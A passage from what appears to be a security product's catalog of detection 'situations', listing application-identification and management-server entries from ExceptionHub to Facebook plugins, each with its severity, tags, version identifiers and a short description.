Last changed: sgpkg-ips-1678-5242
Description: ExceptionHub tracks JavaScript errors that occur on your site and provides you with a stack trace to help you debug. Similar errors are grouped togeather for convenience.
Back to top

Exchange-RPC-Over-HTTP

About this situation: Exchange RPC over HTTP detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous
First detected in: sgpkg-ips-474-5211
Last changed: sgpkg-ips-1638-5242
Description: RPC over HTTP is a method/feature for connecting Outlook 2003 client to the corporate Exchange Server 2003 from the Internet or WAN, without the need to establish a VPN session.
Back to top

Excite-Webmail

About this situation: Excite WebMail usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Web Mail, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-636-5211
Description: Web based mail provided by Excite.
Back to top

Executable File

About this situation: Windows executable file detected
Context: File Stream Redirection
Severity: 2
Tags: File Type Identification, Content Identification, Microsoft Windows Executable
First detected in: sgpkg-ips-610-5211
Last changed: sgpkg-ips-610-5211
Description:
Back to top

Execution of Backup Task Failed

About this situation: Execution of Backup Task Failed
Context: Management Server situation
Severity: 3
Tags: SMC
First detected in: sgpkg-ips-154-2032
Last changed: sgpkg-ips-1535-5242
Description:
Back to top

Execution of Backup Task Succeeded

About this situation: Execution of Backup Task Succeeded
Context: Management Server situation
Severity: 1
Tags: SMC
First detected in: sgpkg-ips-343-4219
Last changed: sgpkg-ips-343-4219
Description:
Back to top

Execution of Command Task Failed

About this situation: Execution of Command Task Failed
Context: Management Server situation
Severity: 3
Tags: SMC
First detected in: sgpkg-ips-154-2032
Last changed: sgpkg-ips-1296-5242
Description:
Back to top

Execution of Command Task Succeeded

About this situation: Execution of Command Task Succeeded
Context: Management Server situation
Severity: 1
Tags: SMC
First detected in: sgpkg-ips-343-4219
Last changed: sgpkg-ips-343-4219
Description:
Back to top

Execution of Log Data Task Failed

About this situation: Execution of Log Data Task Failed
Context: Management Server situation
Severity: 3
Tags: SMC
First detected in: sgpkg-ips-154-2032
Last changed: sgpkg-ips-1535-5242
Description:
Back to top

Execution of Log Data Task Succeeded

About this situation: Execution of Log Data Task Succeeded
Context: Management Server situation
Severity: 1
Tags: SMC
First detected in: sgpkg-ips-343-4219
Last changed: sgpkg-ips-343-4219
Description:
Back to top

Execution of Policy Task Failed

About this situation: Execution of Policy Task Failed
Context: Management Server situation
Severity: 7
Tags: SMC
First detected in: sgpkg-ips-154-2032
Last changed: sgpkg-ips-1535-5242
Description:
Back to top

Execution of Policy Task Succeeded

About this situation: Execution of Policy Task Succeeded
Context: Management Server situation
Severity: 1
Tags: SMC
First detected in: sgpkg-ips-343-4219
Last changed: sgpkg-ips-343-4219
Description:
Back to top

Execution of Remote Upgrade Task Failed

About this situation: Execution of Remote Upgrade Task Failed
Context: Management Server situation
Severity: 3
Tags: SMC
First detected in: sgpkg-ips-154-2032
Last changed: sgpkg-ips-1535-5242
Description:
Back to top

Execution of Remote Upgrade Task Succeeded

About this situation: Execution of Remote Upgrade Task Succeeded
Context: Management Server situation
Severity: 1
Tags: SMC
First detected in: sgpkg-ips-343-4219
Last changed: sgpkg-ips-343-4219
Description:
Back to top

Execution of SOHO Task Failed

About this situation: Execution of SOHO Task Failed
Context: Management Server situation
Severity: 3
Tags: SMC
First detected in: sgpkg-ips-154-2032
Last changed: sgpkg-ips-1296-5242
Description:
Back to top

Execution of SOHO Task Succeeded

About this situation: Execution of SOHO Task Succeeded
Context: Management Server situation
Severity: 1
Tags: SMC
First detected in: sgpkg-ips-343-4219
Last changed: sgpkg-ips-343-4219
Description:
Back to top

EXFO

About this situation: Application EXFO detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: EXFO provides test and monitoring solutions for network service providers and equipment manufacturers.
Back to top

eXo-Platform

About this situation: Application eXo-Platform detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: eXo Platform is an open source enterprise social platform for business portals and social intranets complete with collaborative and content management features.
Back to top

Exosrv

About this situation: Exosrv usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Marketing, Application Routing
First detected in: sgpkg-ips-1151-5242
Last changed: sgpkg-ips-1764-5242
Description: Exosrv is an ad service for adult sites.
Back to top

Expedia

About this situation: Expedia usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: Expedia allows customers to book airline tickets, hotel reservations, car rentals, cruises, vacation packages and various attractions and services via the World Wide Web and telephone travel agents.
Back to top

Expensecloud

About this situation: ExpenseCloud usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-713-5211
Last changed: sgpkg-ips-1764-5242
Description: The TriNet Expense solution is provided by TriNet, a trusted on-demand HR partner to small and medium sized businesses. TriNet solutions help contain costs, minimize employer related risks and relieve administrative burden to keep an management's focus on core business functions.
Back to top

Expenseondemand

About this situation: Application Expenseondemand detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Expense On Demand is a hosted software solution for managing and tracking employee expenses and time sheets. Using a web browser, employees complete electronic forms that then follow an automated process for online approval and payment.
Back to top

ExpenseWatch

About this situation: Application ExpenseWatch detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ExpenseWatch - online expense management system to automate expense reporting.
Back to top

EXPENSEWIRE

About this situation: Application EXPENSEWIRE detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ExpenseWire provides a web-based software-as-a-service expense management solution. By automating the expense reporting process, ExpenseWire allows organizations to simplify submission, control spending, and expedite reimbursement.
Back to top

Expensify

About this situation: Expensify usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: is used to create expense reports.
Back to top

Experian

About this situation: Application Experian detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Experian is a provider of information, analytical tools and marketing services to organizations and consumers to help manage the risk and reward of commercial and financial decisions.
Back to top

ExpertFlyer.com

About this situation: Application ExpertFlyer.com detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Travel and Expense, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ExpertFlyer.com is information research service for frequent fliers and business travelers. Search flight availability, flight awards and upgrades, etc.
Back to top

Experticity

About this situation: Application Experticity detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: 3point5.com is an online campus for retail sales associates, enabling them to interact and discuss brands.
Back to top

ExpertPay-for-Obligors

About this situation: Application ExpertPay-for-Obligors detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ExpertPay - scalable, secure, integrated, effective and practical solutions for: Investment Accounting, Multi-Obligor Securities.
Back to top

ExpertPlan

About this situation: Application ExpertPlan detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ExpertPlan brings simple, affordable retirement plan solutions to small employers. With continued investment in operating efficiencies and client service. Also offers a full range of consulting services including cash balance retirement plans, defined benefit plans, and defined benefit
Back to top

Experts-Exchange

About this situation: Application Experts-Exchange detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Experts Exchange is the network for technology professionals.
Back to top

ExploreGate-LMS

About this situation: Application ExploreGate-LMS detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ExploreGate is a learning management system and a comprehensive Marketplace of training content.
Back to top

ExploreLearning

About this situation: Application ExploreLearning detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ExploreLearning is a Charlottesville, Virginia-based company which operates a large library of interactive online simulations for mathematics and science education in grades 3-12. These simulations are called Gizmos. The company's website describes their library of over 450 Gizmos as the world's largest collection of such materials.
Back to top

Explorer.exe

About this situation: Endpoint Context Agent based explorer.exe detection
Context: EI Correlation
Severity: 1
Tags: System Services, Endpoint
First detected in: sgpkg-ips-982-5242
Last changed: sgpkg-ips-1531-5242
Description: A network connection launched by the Windows system process explorer.exe was detected. Explorer.exe, or Windows Explorer, is used for managing the Windows Graphical Shell. Explorer.exe network connections are usually produced by Windows Push Notification Services.
Back to top

ExpressionEngine

About this situation: Application ExpressionEngine detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ExpressionEngine is a modular content management system developed by EllisLab.
Back to top

Exsalerate

About this situation: Application Exsalerate detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Exsalerate is online CRM software designed for small and medium business.
Back to top

Exsellence

About this situation: Application Exsellence detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Exsellence is a Business Intelligence solution which can be deployed effortlessly as a SaaS model.
Back to top

Extabit

About this situation: Extabit usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Storage, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: This site is a data storage service that allows users to upload and share files (for example, photos, music, videos and other files).
Back to top

Extended Protection

About this situation: The parent category that contains the following categories: Dynamic DNS, Elevated Exposure, Emerging Exploits, Newly Registered Websites and Suspicious Content.
Context: URL Application Context
Severity: 1
Tags: Extended Protection, Security Risk
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: The parent category that contains the following categories: Dynamic DNS, Elevated Exposure, Emerging Exploits, Newly Registered Websites and Suspicious Content.
Back to top

Extendedtechnology

About this situation: Application Extendedtechnology detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Extended technology providing creative solutions for Data Protection,Web Development,Cartridge Refurbishing and Personalized Gifting
Back to top

Extendr

About this situation: Application Extendr detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Extendr.com page powers the consolidation of a complete web footprint-whether that's for an individual or a company. Use .extendr to create a root level introduction to your portfolio spread across the web.
Back to top

External Gateway does not trust new VPN Certificate Authority

About this situation: Certificate Authority renewal: External Gateway does not trust new VPN Certificate Authority
Context: Management Server situation
Severity: 5
Tags: SMC
First detected in: sgpkg-ips-271-4219
Last changed: sgpkg-ips-1296-5242
Description: VPN Certificate Authority renewal: External Gateway that trusts VPN Certificate Authority 'Internal IPsec CA' does not trust the new VPN Certificate Authority. Import the new VPN Certificate Authority to the External Gateway and set the External Gateway to trust the new VPN Certificate Authority.
Back to top

External Gateway that trusts all VPN Certificate Authorities does not trust new VPN Certificate Authority

About this situation: Certificate Authority renewal: External Gateway that trusts all VPN Certificate Authorities does not trust new VPN Certificate Authority
Context: Management Server situation
Severity: 5
Tags: SMC
First detected in: sgpkg-ips-271-4219
Last changed: sgpkg-ips-1296-5242
Description: VPN Certificate Authority renewal: External Gateway that trusts all defined VPN Certificate Authorities does not trust the new VPN Certificate Authority. Import the new VPN Certificate Authority to the External Gateway and set the External Gateway to trust the new VPN Certificate Authority.
Back to top

Extility

About this situation: Application Extility detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: The Extility product is software stack to enable any company to run their own private or public cloud.
Back to top

EXTOL

About this situation: Application EXTOL detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: EXTOL provides integration software and services that enable enterprises to connect with customers and suppliers.
Back to top

ExxpertApps

About this situation: Application ExxpertApps detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ExxpertApps helps enterpriese to manage, contacts, companies, projects, opportunities, documents, internal resources, email campaigns, landing pages, surveys, products, online sales, online procurement, online payments, enterprise communications, etc.
Back to top

EY-CertifyPoint

About this situation: Application EY-CertifyPoint detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: EY CertifyPoint is an independent and impartial certification institute, that focuses on arranging, managing and utilizing certification frameworks and systems for quality and environmental assurance systems, information security management systems, Labor Law and security systems.
Back to top

Eye-Fi

About this situation: Application Eye-Fi detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Eyefi Wireless SD Cards with built-in WiFi - make your camera wireless. Upload photos and videos wirelessly to your computer and to the web.
Back to top

Eylean

About this situation: Application Eylean detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Eylean Board - Kanban and scrum board for project task and team management.
Back to top

eZ-Account

About this situation: Application eZ-Account detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Zachary Systems is provider of services and software that integrate small business accounting software with financial institutions such as banks, credit unions, credit card processors and online payment systems.
Back to top

Ez-Texting

About this situation: Application Ez-Texting detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Ez Texting - Send mass text messages to your customers using our easy, affordable SMS Marketing service.
Back to top

EZasset-Business-Asset-Management

About this situation: Application EZasset-Business-Asset-Management detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: EZasset supports all of your key asset management operations and business processes.
Back to top

EZBIS

About this situation: Application EZBIS detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: EZBIS Office is a uniquely-designed chiropractic software package for chiropractic practice management, combining ease-of-use with a fully comprehensive, automated and high-tech software system.
Back to top

eZCom---Lingo

About this situation: Application eZCom---Lingo detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ZCom Lingo is a smart and time-saving EDI (Electronic Data Interchange) application that simplifies and speeds the trading process
Back to top

eZee-Centrix

About this situation: Application eZee-Centrix detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: eZee Centrix is a software solution provider for the hospitality industry.
Back to top

Ezidebit

About this situation: Application Ezidebit detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Ezidebit offers businesses custom payment solutions that improve cash flow by optimising the way customer payments are collected.
Back to top

EZShield

About this situation: Application EZShield detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: EZShield works with partners in the financial services, benefits/payroll, insurance and warranty markets to help protect the identity of their consumer and small business customers.
Back to top

EZTrackIt

About this situation: Application EZTrackIt detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: EZTrackIt is a web-based package and item tracking system designed to be easy to use, flexible, and usable in any industry.
Back to top

ezyCollect

About this situation: Application ezyCollect detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ezyCollect is secure cloud based application that integrates with your accounting software. It determines which invoices are overdue, by how long, and then gives you the ability to automate, schedule and distribute personalised communication reminders
Back to top

F-Prot-AntiVirus-Update-Service

About this situation: F-Prot AntiVirus update service usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Updates, Application Routing
First detected in: sgpkg-ips-520-5211
Last changed: sgpkg-ips-1706-5242
Description: F-Prot AntiVirus update service usage has been detected.
Back to top

F-Secure

About this situation: F-Secure usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-1151-5242
Last changed: sgpkg-ips-1151-5242
Description: F-Secure is a Finnish security company that develops variouns security services and products.
Back to top

F-Secure Installer

About this situation: Endpoint Context Agent based F-Secure Installer detection
Context: EI Correlation
Severity: 1
Tags: Software / System Updates, Endpoint
First detected in: sgpkg-ips-992-5242
Last changed: sgpkg-ips-992-5242
Description: F-Secure Installer endpoint application has been detected. This software is used to install products developed by F-Secure, such as Workstation Security.
Back to top

F-Secure SAFE

About this situation: Endpoint Context Agent based F-Secure SAFE detection
Context: EI Correlation
Severity: 1
Tags: Security, Endpoint
First detected in: sgpkg-ips-986-5242
Last changed: sgpkg-ips-986-5242
Description: A client process associated with F-Secure SAFE application has been detected. F-Secure SAFE is an internet security product by F-Secure.
Back to top

F-Secure Software Updater

About this situation: Endpoint Context Agent based F-Secure Software Updater
Context: EI Correlation
Severity: 1
Tags: Software / System Updates, Endpoint
First detected in: sgpkg-ips-992-5242
Last changed: sgpkg-ips-992-5242
Description: F-Secure Software Updater endpoint application has been detected. Software Updater is used to keep products developed by F-Secure, such as Workstation Security, updated.
Back to top

F-Secure-Automatic-Updates

About this situation: F-Secure Automatic Updates usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Updates, Application Routing
First detected in: sgpkg-ips-521-5211
Last changed: sgpkg-ips-943-5242
Description: This service is used to deliver updates for various products developed by F-Secure.
Back to top

F-Secure-Management-Server

About this situation: F-Secure Management Server usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-601-5211
Last changed: sgpkg-ips-1638-5242
Description: F-Secure Management Server usage has been detected.
Back to top

F-Secure-Online-Backup

About this situation: F-Secure Online Backup usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Storage, Application Routing
First detected in: sgpkg-ips-521-5211
Last changed: sgpkg-ips-628-5211
Description: F-Secure Online Backup is a backup software that allows users to back up and store personal, business and enterprise data.
Back to top

F5-Networks

About this situation: Application F5-Networks detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: F5 Networks helps integrate technologies to provide control of the infrastructure, application delivery and data management. It gives users access to applications from corporate desktops and smart devices.
Back to top

Fabasoft

About this situation: Application Fabasoft detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Fabasoft is a European software manufacturer and cloud provider. Fabasoft's software products ensure the consistent capture, process-oriented handling, secure storage and context-sensitive finding of all digital business documents. These functions are used in both on-premises installations in customer data processing centres, as well as SaaS and cloud services.
Back to top

Fabasoft-Folio-Cloud

About this situation: Fabasoft Folio Cloud usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-567-5211
Last changed: sgpkg-ips-629-5211
Description: It focuses on enabling secure collaboration via the internet and is web-based with iOS and Android apps for use on mobile devices. Folio Cloud facilitates both informal and structured collaboration. The core element for collaboration in Folio Cloud is the team room, a team room is a protected area in the cloud for storing data. Users may have read only access, change access or full control within a team room.
Back to top

Fabulous

About this situation: Application Fabulous detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Fabulous.com provides expert tools to manage domain registration, sales and monetization for domain portfolio owners.
Back to top

Facebook

About this situation: Facebook usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-392-4219
Last changed: sgpkg-ips-1858-5242
Description: Facebook is a free-access social networking website that is operated and privately owned by Facebook Inc. The service can be accessed using a web browser at site: http://www.facebook.com. This application can match on any traffic that is identified as Facebook based on HTTP headers, URL, DNS, IP-address or TLS parameters like SNI or certificate. It is possible that traffic produced by other Facebook subsidiaries such as Instagram or Whatsapp may be identified with this application if the traffic is not decrypted.
Back to top

Facebook Apps

About this situation: Facebook function that enables a user to access or utilize an app.
Context: URL Application Context
Severity: 1
Tags: Social Web - Facebook, Productivity Loss
First detected in: sgpkg-ips-805-5242
Last changed: sgpkg-ips-805-5242
Description: Facebook function that enables a user to access or utilize an app.
Back to top

Facebook Chat

About this situation: Facebook function that enables a user to chat within the Facebook community.
Context: URL Application Context
Severity: 1
Tags: Social Web - Facebook, Productivity Loss
First detected in: sgpkg-ips-805-5242
Last changed: sgpkg-ips-805-5242
Description: Facebook function that enables a user to chat within the Facebook community.
Back to top

Facebook Commenting

About this situation: Facebook function that enables a user to comment or like.
Context: URL Application Context
Severity: 1
Tags: Social Web - Facebook, Productivity Loss
First detected in: sgpkg-ips-805-5242
Last changed: sgpkg-ips-805-5242
Description: Facebook function that enables a user to comment or like.
Back to top

Facebook Events

About this situation: Facebook function that enables a user to create, modify or respond to an event within the Facebook community.
Context: URL Application Context
Severity: 1
Tags: Social Web - Facebook, Productivity Loss
First detected in: sgpkg-ips-805-5242
Last changed: sgpkg-ips-805-5242
Description: Facebook function that enables a user to create, modify or respond to an event within the Facebook community.
Back to top

Facebook Friends

About this situation: Facebook function that enables a user to add a connection.
Context: URL Application Context
Severity: 1
Tags: Social Web - Facebook, Productivity Loss
First detected in: sgpkg-ips-805-5242
Last changed: sgpkg-ips-805-5242
Description: Facebook function that enables a user to add a connection.
Back to top

Facebook Games

About this situation: Facebook function that enables a user to access or play a game.
Context: URL Application Context
Severity: 1
Tags: Social Web - Facebook, Productivity Loss
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Facebook function that enables a user to access or play a game.
Back to top

Facebook Groups

About this situation: Facebook function that enables a user to create, modify or join a group within the Facebook community.
Context: URL Application Context
Severity: 1
Tags: Social Web - Facebook, Productivity Loss
First detected in: sgpkg-ips-805-5242
Last changed: sgpkg-ips-805-5242
Description: Facebook function that enables a user to create, modify or join a group within the Facebook community.
Back to top

Facebook Mail

About this situation: Facebook function that enables a user to send an email within the Facebook community.
Context: URL Application Context
Severity: 1
Tags: Social Web - Facebook, Productivity Loss
First detected in: sgpkg-ips-805-5242
Last changed: sgpkg-ips-805-5242
Description: Facebook function that enables a user to send an email within the Facebook community.
Back to top

Facebook Photo Upload

About this situation: Facebook function that enables a user to upload a photo.
Context: URL Application Context
Severity: 1
Tags: Social Web - Facebook, Productivity Loss
First detected in: sgpkg-ips-805-5242
Last changed: sgpkg-ips-805-5242
Description: Facebook function that enables a user to upload a photo.
Back to top

Facebook Posting

About this situation: Facebook function that enables a user to share a post, status or link.
Context: URL Application Context
Severity: 1
Tags: Social Web - Facebook, Productivity Loss
First detected in: sgpkg-ips-805-5242
Last changed: sgpkg-ips-805-5242
Description: Facebook function that enables a user to share a post, status or link.
Back to top

Facebook Questions

About this situation: Facebook function that enables a user to ask a question within the Facebook community.
Context: URL Application Context
Severity: 1
Tags: Social Web - Facebook, Productivity Loss
First detected in: sgpkg-ips-805-5242
Last changed: sgpkg-ips-805-5242
Description: Facebook function that enables a user to ask a question within the Facebook community.
Back to top

Facebook Video Upload

About this situation: Facebook function that enables a user to upload a video.
Context: URL Application Context
Severity: 1
Tags: Social Web - Facebook, Network Bandwidth Loss, Productivity Loss
First detected in: sgpkg-ips-805-5242
Last changed: sgpkg-ips-805-5242
Description: Facebook function that enables a user to upload a video.
Back to top

Facebook-Apps

About this situation: Facebook Apps usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-392-4219
Last changed: sgpkg-ips-1586-5242
Description: Facebook provides internal applications such as Notes, Music, Photos, Games, etc. Facebook also allows third-party developers to develop and integrate their application within Facebook to benefit from social networking experience.
Back to top

Facebook-Chat

About this situation: Facebook Chat usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Chat, Application Routing
First detected in: sgpkg-ips-571-5211
Last changed: sgpkg-ips-1629-5242
Description: Facebook Chat is a chat application offered by Facebook. To properly identify Facebook-Chat usage, HTTPS decryption must be enabled.
Back to top

Facebook-Games

About this situation: Facebook Games usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking
First detected in: sgpkg-ips-1385-5242
Last changed: sgpkg-ips-1586-5242
Description: Facebook based games. This application is meant primarily for detection and blocking. Cannot be used for application routing because detection is made only after TLS handshake is completed.
Back to top

Facebook-Live

About this situation: Facebook Live usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-1129-5242
Last changed: sgpkg-ips-1586-5242
Description: Facebook Live is a service for Facebook users to stream live content. To identify embedded live streams from other Facebook content, HTTPS decryption must be enabled.
Back to top

Facebook-Plugins-Activity-Feed

About this situation: Facebook Activity Feed usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-443-4219
Last changed: sgpkg-ips-1629-5242
Description: Facebook Activity Feed is a Facebook Plugin that shows what the Facebook user's friends and other users are actively doing on the associated website.
Back to top

Facebook-Plugins-Comments

About this situation: Facebook Comments usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-443-4219
Last changed: sgpkg-ips-1629-5242
Description: Facebook Comments is a Facebook Plugin that lets Facebook users leave a comment to Facebook about a third-party website. This application also detects likes on Facebook application.
Back to top

Facebook-Plugins-Facepile

About this situation: Facebook Facepile plugin usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-443-4219
Last changed: sgpkg-ips-1629-5242
Description: Facebook Facepile is a Facebook Plugin that displays thumbnail images of users who liked the third-party web page.
Back to top

Facebook-Plugins-Like-Box

About this situation: Facebook Like Box usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-443-4219
Last changed: sgpkg-ips-1629-5242
Description: Facebook Like Box is a Facebook Plugin that displays thumbnail images of users who liked the web page, recent posts for the web page, and also a Like Button for collecting new supporters.
Back to top

Facebook-Plugins-Like-Button

About this situation: Facebook Like Button usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-443-4219
Last changed: sgpkg-ips-1629-5242
Description: Facebook Like Button is a Facebook plugin that lets Facebook users share if they "Like" a specific content. This application also detects likes on Facebook application.
Back to top

Facebook-Plugins-Login-Button

About this situation: Facebook Login Button usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-443-4219
Last changed: sgpkg-ips-1629-5242
Description: Facebook Login Button is a Facebook Plugin that lets users login to third-party website using their Facebook profile and give permission to the third party website to access their Facebook profile information.
Back to top

Facebook-Plugins-Recommend-Button

About this situation: Facebook Recommend Button usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-443-4219
Last changed: sgpkg-ips-1629-5242
Description: Facebook Recommend Button is a Facebook Plugin that lets Facebook users share if they "Recommend" a specific content.
Back to top

Facebook-Plugins-Recommendations-Box

About this situation: Facebook Recommendations Box usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-443-4219
Last changed: sgpkg-ips-1629-5242
Description: Facebook Recommendations Box is a Facebook Plugin that displays a list of recommendations associated with the third-party website.
Back to top

Facebook-Plugins-Registration

About this situation: Facebook Registration plugin usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-443-4219
Last changed: sgpkg-ips-1629-5242
Description: Facebook Registration Plugin lets users to sign up for third party websites using their Facebook profile.
Back to top

Facebook-Plugins-Send-Button

About this situation: Facebook Send Button usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-443-4219
